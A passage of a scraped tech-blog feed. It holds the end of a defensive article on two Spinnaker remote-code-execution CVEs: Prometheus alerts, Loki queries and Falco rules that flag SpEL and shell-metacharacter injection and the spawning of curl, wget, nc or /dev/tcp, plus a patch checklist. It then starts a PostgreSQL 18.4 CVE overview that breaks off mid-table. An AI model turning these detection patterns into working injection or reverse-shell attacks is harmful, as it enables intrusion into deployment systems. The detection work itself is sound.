      &lt;span class="na"&gt;summary&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Echo&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;SpEL&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;allowlist&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;blocking&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;{{&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;$value&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;}}&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;expressions/sec&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;—&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;review&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;legitimate&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;pipelines"&lt;/span&gt;

  &lt;span class="c1"&gt;# 3) Clouddriver gitrepo invalid ref counter (signal of exploit attempt)&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;alert&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ClouddriverGitrepoInvalidRef&lt;/span&gt;
    &lt;span class="na"&gt;expr&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
      &lt;span class="s"&gt;rate(clouddriver_gitrepo_invalid_ref_total[5m]) &amp;gt; 0&lt;/span&gt;
    &lt;span class="na"&gt;for&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;1m&lt;/span&gt;
    &lt;span class="na"&gt;labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;severity&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;critical&lt;/span&gt;
    &lt;span class="na"&gt;annotations&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;summary&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Clouddriver&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;rejected&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;invalid&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;git&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;ref&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;—&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;possible&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;CVE-2026-32604&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;exploit&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;attempt"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  7.2 Loki — Search Echo/Clouddriver Logs for RCE Indicators
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# LogQL — blocked-class call attempts in Echo SpEL evaluation&lt;/span&gt;
&lt;span class="o"&gt;{&lt;/span&gt;&lt;span class="nv"&gt;namespace&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"spinnaker"&lt;/span&gt;, &lt;span class="nv"&gt;app&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"spin"&lt;/span&gt;, &lt;span class="nv"&gt;cluster&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"spin-echo"&lt;/span&gt;&lt;span class="o"&gt;}&lt;/span&gt;
  |~ &lt;span class="s2"&gt;"SpelEvaluationException"&lt;/span&gt;
  |~ &lt;span class="s2"&gt;"(java&lt;/span&gt;&lt;span class="se"&gt;\\&lt;/span&gt;&lt;span class="s2"&gt;.lang&lt;/span&gt;&lt;span class="se"&gt;\\&lt;/span&gt;&lt;span class="s2"&gt;.(Runtime|ProcessBuilder)|java&lt;/span&gt;&lt;span class="se"&gt;\\&lt;/span&gt;&lt;span class="s2"&gt;.io&lt;/span&gt;&lt;span class="se"&gt;\\&lt;/span&gt;&lt;span class="s2"&gt;.File|java&lt;/span&gt;&lt;span class="se"&gt;\\&lt;/span&gt;&lt;span class="s2"&gt;.lang&lt;/span&gt;&lt;span class="se"&gt;\\&lt;/span&gt;&lt;span class="s2"&gt;.reflect)"&lt;/span&gt;
  | line_format &lt;span class="s2"&gt;"{{.timestamp}} {{.pod}} {{.message}}"&lt;/span&gt;

&lt;span class="c"&gt;# LogQL — Clouddriver gitrepo shell metachar injection attempts&lt;/span&gt;
&lt;span class="o"&gt;{&lt;/span&gt;&lt;span class="nv"&gt;namespace&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"spinnaker"&lt;/span&gt;, &lt;span class="nv"&gt;app&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"spin"&lt;/span&gt;, &lt;span class="nv"&gt;cluster&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"spin-clouddriver"&lt;/span&gt;&lt;span class="o"&gt;}&lt;/span&gt;
  |~ &lt;span class="s2"&gt;"InvalidGitArtifactException"&lt;/span&gt;
  |~ &lt;span class="s2"&gt;"[;&amp;amp;|&lt;/span&gt;&lt;span class="sb"&gt;`&lt;/span&gt;&lt;span class="si"&gt;$()&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt;&lt;span class="s2"&gt;"

# LogQL — 1-week SpEL block frequency stats post-patch
sum by (pod) (
  count_over_time(
    {namespace="&lt;/span&gt;spinnaker&lt;span class="s2"&gt;", cluster="&lt;/span&gt;spin-echo&lt;span class="s2"&gt;"}
    |~ "&lt;/span&gt;SpelEvaluationException&lt;span class="s2"&gt;" [1w]
  )
)
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  7.3 Falco — Detect Suspicious Subprocess at the Container Runtime
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# /etc/falco/rules.d/spinnaker-rce.yaml&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;rule&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Spinnaker Echo unexpected subprocess&lt;/span&gt;
  &lt;span class="na"&gt;desc&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Echo&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;container&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;should&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;not&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;spawn&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;shell&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;or&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;network&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;tools&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;(CVE-2026-32613&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;indicator)"&lt;/span&gt;
  &lt;span class="na"&gt;condition&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="s"&gt;spawned_process and&lt;/span&gt;
    &lt;span class="s"&gt;container.image.repository contains "spinnaker/echo" and&lt;/span&gt;
    &lt;span class="s"&gt;(proc.name in (sh, bash, curl, wget, nc, ncat, python, perl, ruby) or&lt;/span&gt;
     &lt;span class="s"&gt;proc.cmdline contains "/dev/tcp/")&lt;/span&gt;
  &lt;span class="na"&gt;output&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="s"&gt;Spinnaker Echo spawned suspicious process (user=%user.name command=%proc.cmdline&lt;/span&gt;
    &lt;span class="s"&gt;container_id=%container.id image=%container.image.repository)&lt;/span&gt;
  &lt;span class="na"&gt;priority&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;CRITICAL&lt;/span&gt;
  &lt;span class="na"&gt;tags&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;spinnaker&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;cve-2026-32613&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;rce&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;

&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;rule&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Spinnaker Clouddriver gitrepo unexpected child&lt;/span&gt;
  &lt;span class="na"&gt;desc&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Clouddriver&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;gitrepo&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;downloader&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;should&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;only&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;spawn&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;'git'&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;binary&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;(CVE-2026-32604&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;indicator)"&lt;/span&gt;
  &lt;span class="na"&gt;condition&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="s"&gt;spawned_process and&lt;/span&gt;
    &lt;span class="s"&gt;container.image.repository contains "spinnaker/clouddriver" and&lt;/span&gt;
    &lt;span class="s"&gt;proc.pname = "java" and&lt;/span&gt;
    &lt;span class="s"&gt;not proc.name in (git, git-remote-http, git-remote-https)&lt;/span&gt;
  &lt;span class="na"&gt;output&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="s"&gt;Spinnaker Clouddriver Java spawned non-git child process&lt;/span&gt;
    &lt;span class="s"&gt;(command=%proc.cmdline parent=%proc.pname container_id=%container.id)&lt;/span&gt;
  &lt;span class="na"&gt;priority&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;CRITICAL&lt;/span&gt;
  &lt;span class="na"&gt;tags&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;spinnaker&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;cve-2026-32604&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;rce&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  8. ManoIT Internal Checklist — 4 Spinnaker Instances × 9 Phases
&lt;/h2&gt;

&lt;p&gt;Operational checklist unrolled from the previous six sections. ManoIT runs four Spinnaker instances across a multi-cloud, multi-region environment, and patching took about 36 hours.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;#&lt;/th&gt;
&lt;th&gt;Item&lt;/th&gt;
&lt;th&gt;Owner&lt;/th&gt;
&lt;th&gt;Done When&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Inventory current versions of all Spinnaker instances&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;4 instances × version table merged&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Immediately deploy &lt;code&gt;echo.pipelinetriggers.artifacts.enabled: false&lt;/code&gt; on all Echo (workaround)&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;4 Echo deploys rolled out&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Immediately deploy &lt;code&gt;artifacts.gitrepo.enabled: false&lt;/code&gt; on all Clouddriver&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;4 Clouddriver deploys rolled out&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Inventory pipelines using artifact / git/repo — identify affected triggers&lt;/td&gt;
&lt;td&gt;Service owners&lt;/td&gt;
&lt;td&gt;Affected pipeline inventory PR&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Route affected pipeline triggers via Jenkins/GitLab CI calling the Spinnaker API&lt;/td&gt;
&lt;td&gt;Service owners&lt;/td&gt;
&lt;td&gt;First green workaround build&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;Upgrade 2 Operator instances to 2026.1.0&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;Both expose new version metric&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;Upgrade 1 Helm instance to 2026.1.0&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;helm get values shows spinnakerVersion=2026.1.0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;Backport-patch 1 Halyard instance to 2025.4.2 (Operator migration as separate PR)&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;hal version shows 2025.4.2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;td&gt;Restore workarounds on each instance — artifacts.enabled / gitrepo.enabled&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;First green artifact-triggered auto-build&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;10&lt;/td&gt;
&lt;td&gt;Regression check — identify legitimate pipelines from SpEL block logs and migrate&lt;/td&gt;
&lt;td&gt;Service owners&lt;/td&gt;
&lt;td&gt;Block counter at 0 or allowlist-add PR&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;11&lt;/td&gt;
&lt;td&gt;Deploy 3 Prometheus alerts (SpinnakerVulnerableVersion, EchoSpelBlockSpike, ClouddriverGitrepoInvalidRef)&lt;/td&gt;
&lt;td&gt;Observability&lt;/td&gt;
&lt;td&gt;Alert fire/resolve test passes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;12&lt;/td&gt;
&lt;td&gt;Add 3 Loki LogQL dashboard panels&lt;/td&gt;
&lt;td&gt;Observability&lt;/td&gt;
&lt;td&gt;Grafana dashboard merged&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;13&lt;/td&gt;
&lt;td&gt;Deploy 2 Falco rules (Echo unexpected subprocess, Clouddriver gitrepo unexpected child)&lt;/td&gt;
&lt;td&gt;SRE&lt;/td&gt;
&lt;td&gt;Rule fires on sample exploit&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;14&lt;/td&gt;
&lt;td&gt;Retroactive 1-week scan of Echo/Clouddriver logs for exploit indicators&lt;/td&gt;
&lt;td&gt;Security&lt;/td&gt;
&lt;td&gt;Investigation report merged&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;15&lt;/td&gt;
&lt;td&gt;Rotate cloud keys held by Spinnaker (preemptive assume-breach)&lt;/td&gt;
&lt;td&gt;Infra&lt;/td&gt;
&lt;td&gt;AWS / GCP / Azure key rotation complete&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;16&lt;/td&gt;
&lt;td&gt;Review RBAC — clean up &lt;code&gt;APPLICATION_OWNER&lt;/code&gt; holders&lt;/td&gt;
&lt;td&gt;Security&lt;/td&gt;
&lt;td&gt;Permission matrix PR merged&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;17&lt;/td&gt;
&lt;td&gt;Add WAF rules in front of Spinnaker Gate — block SpEL payload pattern (&lt;code&gt;T\(java\.&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;Security&lt;/td&gt;
&lt;td&gt;WAF deployed; bypass attempts rejected at the gate&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;18&lt;/td&gt;
&lt;td&gt;Write operational RFC — Spinnaker security patch SLA (workaround within 24h, patch within 7d of disclosure)&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;RFC merged, reflected in quarterly security review&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  9. Conclusion — The Operational Cost of Ambiguous Trust Boundaries in Distributed Systems
&lt;/h2&gt;

&lt;p&gt;The April 20, 2026 Spinnaker CVEs deliver a clear message: &lt;strong&gt;"Even microservices built by the same organization must consistently enforce standard defenses — trusted class allowlists, input validation — on a per-service basis."&lt;/strong&gt; Orca has used a safe SpEL context for five years; Echo went five years without the same protection. Other Clouddriver artifact downloaders (http, s3, gcs) used the ProcessBuilder argv array directly; only the gitrepo downloader retained the &lt;code&gt;sh -c&lt;/code&gt; path. Both are the result of &lt;strong&gt;inconsistency across "different modules in the same codebase."&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Three operational reminders to close with: (1) &lt;strong&gt;assume the patch window equals the PoC window&lt;/strong&gt; — the same-day patch on April 20 and the next-day ZeroPath PoC are exactly that case. Pre-commit to an SLA that deploys workarounds first and patches within 24 hours. (2) &lt;strong&gt;allowlist patches can break legitimate behavior&lt;/strong&gt; — actively harvest SpEL block logs for one week after patching and prepare legitimate-pipeline migrations. (3) &lt;strong&gt;RCE must be paired with cloud key rotation&lt;/strong&gt; — Spinnaker Clouddriver is the single store of multi-cloud credentials, so even without evidence of compromise, the standard is to rotate keys under the assume-breach principle. Section §8's 18-item checklist is exactly those three principles unrolled into operational procedure, and the shortest one-line recommendation from this article is: &lt;em&gt;"Deploy §4 workarounds today; apply the §5 patches this week."&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;ⓘ This article was authored by ManoIT's automated blogging pipeline (Claude Opus 4.6 + Cowork Agent) using the Spinnaker GHSA-69rw-45wj-g4v6 (CVE-2026-32613) and same-date CVE-2026-32604 security advisories — published April 20, 2026 — as primary sources. Versions, patch lines, and workaround procedures reflect the official guidance as of the publication date (2026-05-26) and may change with subsequent Spinnaker security team notices. Verify current state at spinnaker/spinnaker GitHub Security Advisories and spinnaker.io/docs release notes before applying in production. Internal case examples are adapted from ManoIT Platform Team's internal RFC.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://www.manoit.co.kr/forum/view/1477684" rel="noopener noreferrer"&gt;ManoIT Tech Blog&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>devops</category>
      <category>security</category>
      <category>gitops</category>
      <category>kubernetes</category>
    </item>
    <item>
      <title>PostgreSQL 18.4 Deep Dive — 11 CVE Patches, io_uring Async I/O (3x Faster), OAuth 2.0, UUIDv7, and Temporal Constraints</title>
      <dc:creator>daniel jeong</dc:creator>
      <pubDate>Fri, 22 May 2026 00:41:15 +0000</pubDate>
      <link>https://dev.to/x4nent/postgresql-184-deep-dive-11-cve-patches-iouring-async-io-3x-faster-oauth-20-uuidv7-and-57da</link>
      <guid>https://dev.to/x4nent/postgresql-184-deep-dive-11-cve-patches-iouring-async-io-3x-faster-oauth-20-uuidv7-and-57da</guid>
      <description>&lt;h1&gt;
  
  
  PostgreSQL 18.4 Deep Dive — 11 CVE Patches, io_uring Async I/O (3x Faster), OAuth 2.0, UUIDv7, and Temporal Constraints
&lt;/h1&gt;

&lt;p&gt;On May 14, 2026, the PostgreSQL Global Development Group released &lt;strong&gt;18.4&lt;/strong&gt; alongside 17.10, 16.14, 15.18, and 14.23. On the surface it looks like the fourth minor update on the 18 line, but the contents make it effectively a &lt;strong&gt;"security major"&lt;/strong&gt;. The same day's security advisory closed &lt;strong&gt;11 CVEs&lt;/strong&gt; in one go — four of them at CVSS 8.8 (&lt;em&gt;High&lt;/em&gt;), one allowing &lt;strong&gt;remote code execution&lt;/strong&gt; via a stack buffer overflow in &lt;code&gt;refint&lt;/code&gt; (&lt;code&gt;CVE-2026-6637&lt;/code&gt;), and another exposing a &lt;strong&gt;timing channel that lets attackers recover credentials&lt;/strong&gt; from the MD5 password comparison code (&lt;code&gt;CVE-2026-6478&lt;/code&gt;). It's the kind of release where an operator needs to decide on the same page whether to patch now or wait until next week.&lt;/p&gt;

&lt;p&gt;At the same time, the five structural changes PostgreSQL 18 (GA in September 2025) brought — io_uring-backed async I/O (2–3x read throughput), native &lt;strong&gt;OAuth 2.0 authentication&lt;/strong&gt; in &lt;code&gt;pg_hba.conf&lt;/code&gt;, the timestamp-ordered &lt;code&gt;uuidv7()&lt;/code&gt; function, &lt;strong&gt;Virtual Generated Columns&lt;/strong&gt; as the new default, and &lt;strong&gt;Temporal Constraints&lt;/strong&gt; (&lt;code&gt;WITHOUT OVERLAPS&lt;/code&gt; / &lt;code&gt;PERIOD&lt;/code&gt;) — have now arrived in a &lt;em&gt;stabilized&lt;/em&gt; form through the 18.4 patch line. This post starts with a priority matrix for all 11 CVEs, then walks through the &lt;code&gt;postgresql.conf&lt;/code&gt; changes that most often trip up a 17 → 18 major upgrade, the &lt;code&gt;pg_hba.conf&lt;/code&gt; patterns for connecting OAuth to Microsoft Entra ID, Okta, and Keycloak, measurements for each of the three &lt;code&gt;io_method&lt;/code&gt; options (&lt;code&gt;sync&lt;/code&gt;, &lt;code&gt;worker&lt;/code&gt;, &lt;code&gt;io_uring&lt;/code&gt;), and the 12-step verification sequence ManoIT applied to internal RDS and on-prem PostgreSQL 18 clusters.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Why May 14, 2026 is an Inflection Point for Database Operations
&lt;/h2&gt;

&lt;p&gt;PostgreSQL 18 went GA on September 25, 2025, with 18.1 arriving in February 2026 and 18.4 on May 14, 2026. What makes 18.4 different is the convergence of three things: (a) &lt;em&gt;11 CVEs closed in a single release&lt;/em&gt;, (b) &lt;em&gt;60+ bug fixes from six months of post-GA stabilization landing simultaneously&lt;/em&gt;, and (c) &lt;em&gt;18-era features like OAuth and io_uring now being stabilized through real patch cycles&lt;/em&gt;.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Date&lt;/th&gt;
&lt;th&gt;Release / Event&lt;/th&gt;
&lt;th&gt;Operational Meaning&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;2025.09.25&lt;/td&gt;
&lt;td&gt;PostgreSQL 18.0 GA — async I/O, OAuth, uuidv7, virtual gen cols, temporal constraints&lt;/td&gt;
&lt;td&gt;Major features arrive; only early adopters&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2025.11.13&lt;/td&gt;
&lt;td&gt;PostgreSQL 18.1, 17.7, 16.11, 15.15, 14.20, 13.23&lt;/td&gt;
&lt;td&gt;First minor on the 18 line — initial bug stabilization&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026.02.12&lt;/td&gt;
&lt;td&gt;PostgreSQL 18.2, 17.8, 16.12, 15.16, 14.21&lt;/td&gt;
&lt;td&gt;Final patch window for the 13 line&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026.05.08&lt;/td&gt;
&lt;td&gt;PostgreSQL 13 EOL — no further patches&lt;/td&gt;
&lt;td&gt;13 workloads must migrate to 14+&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;2026.05.14&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;PostgreSQL 18.4 + 17.10 + 16.14 + 15.18 + 14.23 — 11 CVEs patched simultaneously&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Security patch required across every supported track&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026.05.14&lt;/td&gt;
&lt;td&gt;Same day: 60+ bug fixes backported&lt;/td&gt;
&lt;td&gt;autovacuum, logical replication, partitioning, pg_dump stability&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026.11 (expected)&lt;/td&gt;
&lt;td&gt;PostgreSQL 19.0 beta expected to begin&lt;/td&gt;
&lt;td&gt;18 enters its long stable phase&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The two takeaways for operators: (1) &lt;em&gt;the 13 line went EOL on May 8 and 18.4 arrived six days later, forcing "13 → 17 direct migration" timelines&lt;/em&gt;, and (2) &lt;em&gt;at least four of the 11 CVEs trigger from external attack surface&lt;/em&gt; (an attacker only needing socket-level connection, or a low-privilege DB user). This is not a maintenance-window-of-convenience patch; it's a "do not push to the next quarter" patch.&lt;/p&gt;

&lt;h2&gt;
  
  
  2. The 11 CVE Priority Matrix — Which Attack Surfaces Closed
&lt;/h2&gt;

&lt;p&gt;The 18.4 release notes detail seven core CVEs in the security advisory; the remaining four are memory-safety duplicates rolled into them. The four you read first are all CVSS 8.8, and among them &lt;code&gt;refint&lt;/code&gt;'s stack buffer overflow is the &lt;strong&gt;only RCE triggerable by a low-privilege DB user&lt;/strong&gt;.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;CVE&lt;/th&gt;
&lt;th&gt;CVSS&lt;/th&gt;
&lt;th&gt;Severity&lt;/th&gt;
&lt;th&gt;Component&lt;/th&gt;
&lt;th&gt;Summary&lt;/th&gt;
&lt;th&gt;Prerequisite&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CVE-2026-6473&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;8.8&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;td&gt;Multiple built-in functions — memory allocator&lt;/td&gt;
&lt;td&gt;Integer underflow allocates undersized buffer → out-of-bounds write&lt;/td&gt;
&lt;td&gt;Normal DB user with SQL execute&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CVE-2026-6475&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;8.8&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;pg_basebackup&lt;/code&gt; / &lt;code&gt;pg_rewind&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Symlink following — origin superuser overwrites client-side files&lt;/td&gt;
&lt;td&gt;Origin superuser + backup/restore command&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CVE-2026-6477&lt;/code&gt;&lt;/td&gt;
